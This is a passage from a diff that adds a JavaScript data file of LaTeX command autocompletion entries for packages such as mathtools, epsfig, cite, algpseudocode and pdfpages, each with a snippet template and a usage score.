'mathtools-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'mathtools-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'mathtools-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'mathtools-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'mathtools-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'mathtools-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'mathtools-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'mathtools-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'mathtools-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'mathtools-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'mathtools-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'mathtools-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'mathtools-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'mathtools-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'mathtools-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'mathtools-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'mathtools-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'mathtools-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'mathtools-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'mathtools-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'mathtools-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'mathtools-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'mathtools-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'mathtools-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'mathtools-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'mathtools-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'mathtools-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'mathtools-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'mathtools-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'mathtools-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'mathtools-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'mathtools-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'mathtools-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'mathtools-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'mathtools-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'mathtools-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'mathtools-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'mathtools-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'mathtools-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'mathtools-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'mathtools-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'mathtools-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'mathtools-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'mathtools-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'mathtools-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'mathtools-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'mathtools-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'mathtools-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'mathtools-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'mathtools-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'mathtools-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'mathtools-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'mathtools-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'mathtools-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'mathtools-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'mathtools-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'mathtools-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'mathtools-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'mathtools-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'mathtools-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'mathtools-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'mathtools-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'mathtools-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'mathtools-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'mathtools-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'mathtools-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'mathtools-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'mathtools-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'mathtools-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'mathtools-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'mathtools-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'mathtools-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'mathtools-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'mathtools-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'mathtools-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'mathtools-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'mathtools-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'mathtools-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'mathtools-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'mathtools-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'mathtools-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'mathtools-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'mathtools-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'mathtools-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'mathtools-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'mathtools-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'mathtools-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'mathtools-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'mathtools-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'mathtools-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'mathtools-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'mathtools-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'mathtools-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'mathtools-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'mathtools-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'mathtools-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'mathtools-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'mathtools-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'mathtools-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'mathtools-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'mathtools-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'mathtools-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'mathtools-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'mathtools-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'mathtools-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'mathtools-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'mathtools-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'mathtools-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'mathtools-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'mathtools-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'mathtools-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'mathtools-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mathtools-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'mathtools-cmd', + score: 0.0063276692758974925, + }, + ], + verbatim: [ + { + caption: '\\endverbatim', + snippet: '\\endverbatim', + meta: 'verbatim-cmd', + score: 0.0022216421267780076, + }, + { + caption: '\\verbatim', + snippet: '\\verbatim', + meta: 'verbatim-cmd', + score: 0.0072203369120285256, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'verbatim-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'verbatim-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'verbatim-cmd', + score: 0.413853376001159, + }, + { + caption: '\\verbatiminput{}', + snippet: '\\verbatiminput{$1}', + meta: 'verbatim-cmd', + score: 0.0024547099784948665, + }, + { + caption: '\\verbatiminput', + snippet: '\\verbatiminput', + meta: 'verbatim-cmd', + score: 0.0024547099784948665, + }, + ], + wrapfig: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'wrapfig-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'wrapfig-cmd', + score: 0.413853376001159, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'wrapfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'wrapfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\wrapfigure{}{}', + snippet: '\\wrapfigure{$1}{$2}', + meta: 'wrapfig-cmd', + score: 0.0003295435821387379, + }, + ], + epsfig: [ + { + caption: '\\epsfbox{}', + snippet: '\\epsfbox{$1}', + meta: 'epsfig-cmd', + score: 0.00013712781345832882, + }, + { + caption: '\\psfig{}', + snippet: '\\psfig{$1}', + meta: 'epsfig-cmd', + score: 0.0017552046452897515, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'epsfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'epsfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'epsfig-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'epsfig-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'epsfig-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'epsfig-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'epsfig-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'epsfig-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'epsfig-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epsfig-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'epsfig-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'epsfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'epsfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'epsfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'epsfig-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'epsfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'epsfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'epsfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'epsfig-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'epsfig-cmd', + score: 0.008565354665444157, + }, + ], + cite: [ + { + caption: '\\citeonline{}', + snippet: '\\citeonline{$1}', + meta: 'cite-cmd', + score: 0.014277840409455324, + }, + { + caption: '\\citenum{}', + snippet: '\\citenum{$1}', + meta: 'cite-cmd', + score: 0.0027420903627423383, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'cite-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'cite-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nocite{}', + snippet: '\\nocite{$1}', + meta: 'cite-cmd', + score: 0.04990693820960752, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'cite-cmd', + score: 2.341195220791228, + }, + ], + lipsum: [ + { + caption: '\\setlipsumdefault{}', + snippet: '\\setlipsumdefault{$1}', + meta: 'lipsum-cmd', + score: 0.00024112945034541791, + }, + { + caption: '\\lipsum[]', + snippet: '\\lipsum[$1]', + meta: 'lipsum-cmd', + score: 0.0300787181624191, + }, + ], + algpseudocode: [ + { + caption: '\\algrenewcommand', + snippet: '\\algrenewcommand', + meta: 'algpseudocode-cmd', + score: 0.0019861803661869416, + }, + { + caption: '\\Statex', + snippet: '\\Statex', + meta: 'algpseudocode-cmd', + score: 0.008622777195102994, + }, + { + caption: '\\BState{}', + snippet: '\\BState{$1}', + meta: 'algpseudocode-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\BState', + snippet: '\\BState', + meta: 'algpseudocode-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\algloopdefx{}[][]{}', + snippet: '\\algloopdefx{$1}[$2][$3]{$4}', + meta: 'algpseudocode-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algnewcommand', + snippet: '\\algnewcommand', + meta: 'algpseudocode-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\algnewcommand{}[]{}', + snippet: '\\algnewcommand{$1}[$2]{$3}', + meta: 'algpseudocode-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\Comment{}', + snippet: '\\Comment{$1}', + meta: 'algpseudocode-cmd', + score: 0.005178604573219454, + }, + { + caption: '\\algblockdefx{}{}[]', + snippet: '\\algblockdefx{$1}{$2}[$3]', + meta: 'algpseudocode-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algrenewtext{}{}', + snippet: '\\algrenewtext{$1}{$2}', + meta: 'algpseudocode-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algrenewtext{}[]{}', + snippet: '\\algrenewtext{$1}[$2]{$3}', + meta: 'algpseudocode-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algblock{}{}', + snippet: '\\algblock{$1}{$2}', + meta: 'algpseudocode-cmd', + score: 0.0007916858220314837, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'algpseudocode-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\algdef{}[]{}{}{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'algpseudocode-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}{}[]{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}[$5]{$6}{$7}', + meta: 'algpseudocode-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}[]{}', + snippet: '\\algdef{$1}[$2]{$3}[$4]{$5}', + meta: 'algpseudocode-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algtext{}', + snippet: '\\algtext{$1}', + meta: 'algpseudocode-cmd', + score: 0.0005463612015579842, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algpseudocode-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algpseudocode-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algpseudocode-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algpseudocode-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algpseudocode-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algpseudocode-cmd', + score: 0.0018957469739775527, + }, + ], + textpos: [ + { + caption: '\\textblockorigin{}{}', + snippet: '\\textblockorigin{$1}{$2}', + meta: 'textpos-cmd', + score: 0.016306266556901577, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'textpos-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'textpos-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'textpos-cmd', + score: 0.00037306820619479756, + }, + ], + subfig: [ + { + caption: '\\subref{}', + snippet: '\\subref{$1}', + meta: 'subfig-cmd', + score: 0.007192033516871399, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'subfig-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\subfloat[]{}', + snippet: '\\subfloat[$1]{$2}', + meta: 'subfig-cmd', + score: 0.0286920437310672, + }, + { + caption: '\\subfloat{}', + snippet: '\\subfloat{$1}', + meta: 'subfig-cmd', + score: 0.0286920437310672, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'subfig-cmd', + score: 0.00037306820619479756, + }, + ], + enumerate: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'enumerate-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\makelabel', + snippet: '\\makelabel', + meta: 'enumerate-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\makelabel{}', + snippet: '\\makelabel{$1}', + meta: 'enumerate-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\makelabel[]{}', + snippet: '\\makelabel[$1]{$2}', + meta: 'enumerate-cmd', + score: 5.739925426740175e-5, + }, + ], + pdfpages: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdfpages-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'pdfpages-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pdfpages-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\includepdf[]{}', + snippet: '\\includepdf[$1]{$2}', + meta: 'pdfpages-cmd', + score: 0.023931732745590156, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pdfpages-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'pdfpages-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'pdfpages-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'pdfpages-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pdfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pdfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'pdfpages-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'pdfpages-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'pdfpages-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'pdfpages-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pdfpages-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pdfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pdfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'pdfpages-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'pdfpages-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdfpages-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\AddToShipoutPictureFG{}', + snippet: '\\AddToShipoutPictureFG{$1}', + meta: 'pdfpages-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\AddToShipoutPictureBG{}', + snippet: '\\AddToShipoutPictureBG{$1}', + meta: 'pdfpages-cmd', + score: 0.0008957666085644653, + }, + { + caption: '\\AtPageUpperLeft{}', + snippet: '\\AtPageUpperLeft{$1}', + meta: 'pdfpages-cmd', + score: 0.0003608141410278152, + }, + { + caption: '\\LenToUnit{}', + snippet: '\\LenToUnit{$1}', + meta: 'pdfpages-cmd', + score: 0.0007216282820556304, + }, + { + caption: '\\AddToShipoutPicture{}', + snippet: '\\AddToShipoutPicture{$1}', + meta: 'pdfpages-cmd', + score: 0.0017658629469099734, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'pdfpages-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 